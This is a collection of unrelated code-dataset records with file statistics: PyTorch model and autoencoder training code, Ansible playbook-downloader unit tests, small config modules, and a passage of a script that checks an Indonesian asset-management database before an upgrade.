model = ConvNet(in_size, output_size, channels=hyperparams['channels'], pool_every=hyperparams['pool_every'], hidden_dims=hyperparams['hidden_dims'])
return model
elif name == 'DensetNet121':
# create the model from an existing architechture
# explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
model = torchvision.models.densenet121(pretrained=False)
# update the exisiting model's last layer
input_size = model.classifier.in_features
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape) !!!
model.classifier = torch.nn.Linear(input_size, output_size, bias=True)
model.classifier.weight.data.zero_()
model.classifier.bias.data.zero_()
return model
elif name == 'Inception_V3':
# create the models
# explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
print(f'starting to load the model inception_v3 from torchvision.models. this is quite heavy, and might take some time ...')
model = torchvision.models.inception_v3(pretrained=False)
print(f'finished loading model')
# update the existing models last layer
input_size = model.fc.in_features
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape) !!!
model.fc = torch.nn.Linear(input_size, output_size, bias=True)
model.fc.weight.data.zero_()
model.fc.bias.data.zero_()
return model
def get_model_by_name_Mandalay(name, dataset, hyperparams):
'''
prep:
'''
x0, y0 = dataset[0] # NOTE that the third argument recieved here is "column" and is not currently needed
in_size = x0.shape # note: if we need for some reason to add batch dimension to the image (from [3,176,176] to [1,3,176,176]) use x0 = x0.unsqueeze(0) # ".to(device)"
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[
0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape)
'''
get_model_by_name
'''
if name == 'BasicConvNet':
model = ConvNet(in_size, output_size, channels=hyperparams['channels'], pool_every=hyperparams['pool_every'],
hidden_dims=hyperparams['hidden_dims'])
return model
elif name == 'DensetNet121':
# create the model from an existing architechture
# explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
model = torchvision.models.densenet121(pretrained=False)
# update the exisiting model's last layer
input_size = model.classifier.in_features
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[
0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape) !!!
model.classifier = torch.nn.Linear(input_size, output_size, bias=True)
model.classifier.weight.data.zero_()
model.classifier.bias.data.zero_()
return model
elif name == 'Inception_V3':
# create the models
# explanation of all models in: https://pytorch.org/docs/stable/torchvision/models.html
print(
f'starting to load the model inception_v3 from torchvision.models. this is quite heavy, and might take some time ...')
model = torchvision.models.inception_v3(pretrained=False)
print(f'finished loading model')
# update the existing models last layer
input_size = model.fc.in_features
output_size = 1 if isinstance(y0, int) or isinstance(y0, float) else y0.shape[
0] # NOTE: if y0 is an int, than the size of the y0 tensor is 1. else, its size is K (K == y0.shape) !!!
model.fc = torch.nn.Linear(input_size, output_size, bias=True)
model.fc.weight.data.zero_()
model.fc.bias.data.zero_()
return model
def get_Trained_AEnet(dataset_from_matrix_df, z_dim, num_of_epochs, device):
'''
trains the AE net on the matrix dataframe
returns the trained autoencoder model
'''
print("\n----- entered function return_trained_AE_net -----")
'''
prep our dataset and dataloaders
'''
batch_size = 1 # this number was reduced because the server was busy and i got CUDA OUT OF MEMORY. need to increase later
# IMPORTANT NOTE ON THE BATCH SIZE !!!
# at first it was a high number, but due to lack of memory was reduced to 5, which worked.
# then, I found out that if the batch size is not 1, i cannot use the networks encoder network inside AEnet
# because is expects 33K features * 5 batch_size as input - but in __get_item__ (which is the entire end goal of our current method)
# we only get one item at a time.... and so - batch size was changed to 1.
# TODO: later on, this can be improved.
dataset = dataset_from_matrix_df
dataloader = DataLoader(dataset, batch_size, shuffle=True) # note the shuffle, note the num of workers (none==0) !!!
x0 = dataset[0]
num_of_features = len(x0)
'''
prepare model, loss and optimizer instances
'''
# model
connected_layers_dim_list = [100*z_dim, 10*z_dim, 5*z_dim] #NOTE: this is without the first and last layers ! # TODO: change code to get this value from user ? (from the notebook with the hyperparams dictionary)
print(f'note - number of (hidden) linear layers is supposed to be {len(connected_layers_dim_list)}')
model = AutoencoderNet(in_features=num_of_features, connected_layers_dim_list=connected_layers_dim_list, z_dim=z_dim, batch_size=batch_size, device=device)
if device.type == 'cuda':
model = model.to(device=device)
# loss and optimizer
loss_fn = torch.nn.MSELoss()
learning_rate = 1e-4 # TODO: change code to get this value from user ? (from the notebook with the hyperparams dictionary)
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
'''
now we can perform the training
'''
print("****** begin training ******")
max_alowed_number_of_batches = 999999 # the purpose of this var is if i dont realy want all of the batches to be trained uppon ...
num_of_batches = (len(dataset) // batch_size)
if num_of_batches > max_alowed_number_of_batches:
print(f'NOTE: in order to speed up training (while damaging accuracy) the number of batches per epoch was reduced from {num_of_batches} to {max_alowed_number_of_batches}')
num_of_batches = max_alowed_number_of_batches
else:
# make sure there are no leftover datapoints not used because of "//"" calculation above
if (len(dataset) % batch_size) != 0:
num_of_batches = num_of_batches + 1
#
loss_value_averages_of_all_epochs = []
# note 2 loops here: external and internal
for iteration in range(num_of_epochs):
print(f'iteration {iteration+1} of {num_of_epochs} epochs') # this should be commented in notebook
# init variables for external loop
dl_iter = iter(dataloader) # iterator over the dataloader. called only once, outside of the loop, and from then on we use next() on that iterator
loss_values_list = []
for batch_index in range(num_of_batches):
#print(f'iteration {iteration+1} of {num_of_epochs} epochs: batch {batch_index+1} of {num_of_batches} batches', end='\r') # "end='\r'" will cause the line to be overwritten the next print that comes
# # NOTE: this only works in the notebook
# get current batch data
data = next(dl_iter) # note: "data" variable is a list with 2 elements: data[0] is: <class 'torch.Tensor'> data[1] is: <class 'torch.Tensor'>
#
x = data # note : x.shape is: torch.Size([25, 3, 176, 176]) y.shape is: torch.Size([25]) because the batch size is 25
x = x.float() # needed to avoid errors of conversion
if device.type == 'cuda':
x = x.to(device=device)
# Forward pass: compute predicted y by passing x to the model.
x_reconstructed = model(x)
# Compute (and print) loss.
loss = loss_fn(x_reconstructed, x)
loss_values_list.append(loss.item())
# Before the backward pass, use the optimizer object to zero all of the
# gradients for the variables it will update (which are the learnable
# weights of the model). This is because by default, gradients are
# accumulated in buffers( i.e, not overwritten) whenever .backward()
# is called. Checkout docs of torch.autograd.backward for more details.
optimizer.zero_grad()
# Backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# Calling the step function on an Optimizer makes an update to its parameters
optimizer.step()
# Delete the unneeded vectors to free up space in the GPU
del x, x_reconstructed
##end of inner loop
# print(f'\nfinished inner loop.\n')
# data prints on the epoch that ended
# print(f'in this epoch: min loss {np.min(loss_values_list)} max loss {np.max(loss_values_list)}')
# print(f' average loss {np.mean(loss_values_list)}')
average_value_this_epoch = np.mean(loss_values_list)
# print(f'in this epoch: average loss {average_value_this_epoch}')
loss_value_averages_of_all_epochs.append(average_value_this_epoch)
print(f'finished all epochs ! ') # spaces ARE intended
print(f'which means, that this model is now trained.')
print(f'plotting the loss convergence for the training of this model: ')
plot_loss_convergence(loss_value_averages_of_all_epochs, model_name='AE', dataset_name='matrix_dataframe train')
pass
print("\n----- finished function return_trained_AE_net -----\n")
# return the trained model
return model
| 55.013721
| 353
| 0.65271
| 9,281
| 68,162
| 4.581942
| 0.065618
| 0.0206
| 0.018624
| 0.015991
| 0.881623
| 0.860858
| 0.852181
| 0.845291
| 0.839153
| 0.818436
| 0
| 0.009113
| 0.267495
| 68,162
| 1,238
| 354
| 55.058158
| 0.842596
| 0.37474
| 0
| 0.748188
| 0
| 0.007246
| 0.122499
| 0.022188
| 0
| 0
| 0
| 0.008885
| 0.009058
| 1
| 0.021739
| false
| 0.007246
| 0.023551
| 0
| 0.068841
| 0.121377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dffde2551049dbffe59debf25781a29d28813da
| 8,634
|
py
|
Python
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 1
|
2016-12-29T14:14:39.000Z
|
2016-12-29T14:14:39.000Z
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 85
|
2016-12-21T12:58:14.000Z
|
2022-03-29T21:53:30.000Z
|
package/tests/test_playbook_downloader.py
|
IngaAl/Ansible-Shell
|
73113c6317c96b1d5e4109e44b3029dccc828919
|
[
"Apache-2.0"
] | 4
|
2016-12-09T22:41:13.000Z
|
2022-02-02T12:09:16.000Z
|
from unittest import TestCase
from mock import Mock, patch
from cloudshell.cm.ansible.domain.filename_extractor import FilenameExtractor
from cloudshell.cm.ansible.domain.http_request_service import HttpRequestService
from cloudshell.cm.ansible.domain.playbook_downloader import PlaybookDownloader, HttpAuth
from tests.mocks.file_system_service_mock import FileSystemServiceMock
class TestPlaybookDownloader(TestCase):
def setUp(self):
self.zip_service = Mock()
self.http_request_serivce = HttpRequestService()
self.file_system = FileSystemServiceMock()
self.filename_extractor = FilenameExtractor()
self.playbook_downloader = PlaybookDownloader(self.file_system, self.zip_service, self.http_request_serivce, self.filename_extractor)
self.logger = Mock()
self.logger.info = lambda msg: ""
self.reqeust = Mock()
def _set_extract_all_zip(self, files_to_create):
for file_to_create in files_to_create:
self.file_system.create_file(file_to_create)
return files_to_create
def test_playbook_downloader_zip_file_one_yaml(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response=Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_zip_file_two_yaml_correct(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml", "site.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "site.yaml")
def test_playbook_downloader_zip_file_two_yaml_incorrect(self):
self.zip_service.extract_all = lambda zip_file_name: self._set_extract_all_zip(["lie.yaml", "lie2.yaml"])
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
with self.assertRaises(Exception) as e:
self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(str(e.exception),"Playbook file name was not found in zip file")
def test_playbook_downloader_with_one_yaml(self):
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_no_parsing_from_rfc(self):
auth = HttpAuth("user", "pass", "token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=True)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_credentials(self):
auth = HttpAuth("user", "pass", None)
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_credentials)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_token(self):
auth = HttpAuth(None, None, "Token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_not_public)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_with_one_yaml_only_token_with_auth_private_token(self):
auth = HttpAuth(None, None, "Token")
self.reqeust.url = "blabla/lie.yaml"
dic = dict([('content-disposition', 'lie.yaml'), ('Private-Token', 'Token')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = 'hello'
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(side_effect=self.mock_response_valid_for_private_token)
file_name = self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(file_name, "lie.yaml")
def test_playbook_downloader_fails_on_public_and_no_credentials(self):
auth = None
self.reqeust.url = "blabla/lie.zip"
dic = dict([('content-disposition', 'lie.zip')])
self.reqeust.headers = dic
self.reqeust.iter_content.return_value = ''
self.http_request_serivce.get_response = Mock(return_value=self.reqeust)
self.http_request_serivce.get_response_with_headers = Mock(return_value=self.reqeust)
self.playbook_downloader._is_response_valid = Mock(return_value=False)
with self.assertRaises(Exception) as e:
self.playbook_downloader.get("", auth, self.logger, Mock(), True)
self.assertEqual(str(e.exception),"Please make sure the URL is valid, and the credentials are correct and necessary.")
# helpers method to mock the request according the request in order to test the right flow for Token\Cred
def mock_response_valid_for_not_public(self, logger, response, request_method):
return request_method != "public"
def mock_response_valid_for_credentials(self, logger, response, request_method):
return request_method == "username\password"
def mock_response_valid_for_private_token(self, logger, response, request_method):
return 'Private-Token' in response.headers
| 52.327273
| 141
| 0.706278
| 1,091
| 8,634
| 5.285976
| 0.105408
| 0.087741
| 0.062424
| 0.076296
| 0.812901
| 0.78481
| 0.757239
| 0.750997
| 0.733657
| 0.723773
| 0
| 0.000143
| 0.187399
| 8,634
| 165
| 142
| 52.327273
| 0.821836
| 0.01193
| 0
| 0.630769
| 0
| 0
| 0.088042
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 1
| 0.107692
| false
| 0.053846
| 0.046154
| 0.023077
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5c12a3c588902f63ddf29558d9b949394d6dbd8d
| 151
|
py
|
Python
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 82
|
2016-06-29T17:24:43.000Z
|
2021-04-16T06:49:17.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 6
|
2022-01-12T18:22:08.000Z
|
2022-03-25T10:19:27.000Z
|
platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/nixi/phys/Phys_Datasheet.py
|
lmnotran/gecko_sdk
|
2e82050dc8823c9fe0e8908c1b2666fb83056230
|
[
"Zlib"
] | 56
|
2016-08-02T10:50:50.000Z
|
2021-07-19T08:57:34.000Z
|
from pyradioconfig.parts.jumbo.phys.Phys_Datasheet import PHYS_Datasheet
class PHYS_Datasheet_Nixi(PHYS_Datasheet):
# inherit from Jumbo
pass
| 25.166667
| 72
| 0.81457
| 20
| 151
| 5.9
| 0.55
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13245
| 151
| 5
| 73
| 30.2
| 0.900763
| 0.119205
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
5c1e5bdb79789ad6eb950e94240e0029209d0919
| 83
|
py
|
Python
|
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | 1
|
2020-05-01T18:29:12.000Z
|
2020-05-01T18:29:12.000Z
|
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | null | null | null |
__init__.py
|
atsommer/delambre
|
98de94baba3d7994db6be964aaa8bd36b764173f
|
[
"MIT"
] | 1
|
2020-05-01T18:29:15.000Z
|
2020-05-01T18:29:15.000Z
|
try:
from SImodule import SI
except ImportError:
from .SImodule import SI
| 20.75
| 29
| 0.722892
| 11
| 83
| 5.454545
| 0.636364
| 0.4
| 0.6
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240964
| 83
| 4
| 29
| 20.75
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5c4a937c8d705e9e03d97bbe26860b5ef0114f97
| 28,258
|
py
|
Python
|
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
cekUpdateBMD2.0.7.10.py
|
hoaaah/cekibmd
|
39e2d177228283d7e4cbbfc61af59505a507c59e
|
[
"MIT"
] | null | null | null |
import os, sys
import checkfile, json, pymssql, pymysql, threading, time, itertools, vigenere, csv
from pprint import pprint
from getpass import getpass
# (C) Copyright 2018 Heru Arief Wijaya (http://belajararief.com/) untuk INDONESIA.
done = False
def animate():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rPush Data ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
def set_interval(func, sec):
def func_wrapper():
set_interval(func, sec)
func()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
status = False
def selesai():
for c in itertools.cycle(['|', '/', '-', '\\']):
if status:
break
sys.stdout.write('\r ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\rDone! ')
print ("Selamat datang di Cek UPDATE SIMDA BMD 2.0.7.10 ---- v1.0.0 by @hoaaah")
print ("Aplikasi ini akan melakukan pengecekan terhadap permasalahan pada DB BMD sebelum dilakukan updating ke versi 2.0.7.10.")
key = {
'key1': 'donnoWhatToDo',
'key2': 'yesManPaleLo'
}
sourceServer, sourceUsername, sourcePassword, sourceDb = input("Server: "), input("Username: "), getpass(), input("Source Database: ")
print("""------Memeriksa Koneksi-------""")
try:
sourceConn = pymssql.connect(sourceServer, sourceUsername, sourcePassword, sourceDb)
except ConnectionError:
print("""
[x] Data Source Connection failed, check again your config.json
""")
finally:
print("""
""")
if (sourceConn):
print(""" [v] Source Connection Valid""")
# write to CSV first
writeToCsv = csv.writer(open("output.csv", "w"))
t = threading.Thread(target = selesai)
t.start()
print("""
------Memeriksa Permasalahan 1-------
Permasalahan 1 yaitu ID Pmeda di Riwayat tidak memiliki induk pada KIB Induk""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBAR a LEFT JOIN Ta_KIB_A b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBBR a LEFT JOIN Ta_KIB_B b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBCR a LEFT JOIN Ta_KIB_C b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBDR a LEFT JOIN Ta_KIB_D b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
UNION ALL
SELECT a.IDPemda, a.Kd_Id, a.No_Urut, a.Kd_Riwayat, a.Kd_Prov, a.Kd_Kab_Kota, a.Kd_Bidang, a.Kd_Unit, a.Kd_Sub, a.Kd_UPB, a.Kd_Aset1, a.Kd_Aset2, a.Kd_Aset3, a.Kd_Aset4, a.Kd_Aset5, a.No_Register, a.Kd_Pemilik, a.Tgl_Dokumen, a.No_Dokumen, a.Tgl_perolehan, a.Tgl_Pembukuan, a.harga
FROM Ta_KIBER a LEFT JOIN Ta_KIB_E b ON a.IDPemda = b.IDPemda WHERE b.IDPemda IS NULL
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if(result == 0) :
print("------Permasalahan 1 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 1: Solusi data riwayat yang tidak ada induk akan dihapus.'])
writeToCsv.writerow(['IDPemda', 'Kd_Id', 'No_Urut', 'Kd_Riwayat', 'Kd_Prov', 'Kd_Kab_Kota', 'Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'Kd_Pemilik', 'Tgl_Dokumen', 'No_Dokumen', 'Tgl_perolehan', 'Tgl_Pembukuan', 'harga'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 2-------
Permasalahan 2 yaitu terdapat no register ganda untuk suatu jenis aset""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_A
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_B
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_C
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_D
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
UNION ALL
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, jumlah
FROM
(
SELECT Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register, COUNT(IDPemda) AS jumlah
FROM Ta_KIB_E
GROUP BY Kd_Bidang, Kd_Unit, Kd_Sub, Kd_UPB, Kd_Aset1, Kd_Aset2, Kd_Aset3, Kd_Aset4, Kd_Aset5, No_Register
) a WHERE jumlah > 1
""")
sourceRow = sourceCursor.fetchall()
result = sourceCursor.rowcount
if (result == 0) :
print("------Permasalahan 2 Passed-------")
else:
print("------Terdapat ",result," permasalahan-------")
writeToCsv.writerow(['Permasalahan 2: Solusi perbaikan fungsi perhitungan no register.'])
writeToCsv.writerow(['Kd_Bidang', 'Kd_Unit', 'Kd_Sub', 'Kd_UPB', 'Kd_Aset1', 'Kd_Aset2', 'Kd_Aset3', 'Kd_Aset4', 'Kd_Aset5', 'No_Register', 'jumlah'])
writeToCsv.writerows(sourceRow)
print("""
------Memeriksa Permasalahan 3-------
Permasalahan 3 yaitu Tanggal Perolehan di KIB Berbeda dengan di KIB Riwayat""")
sourceCursor = sourceConn.cursor()
sourceCursor.execute("""
SELECT
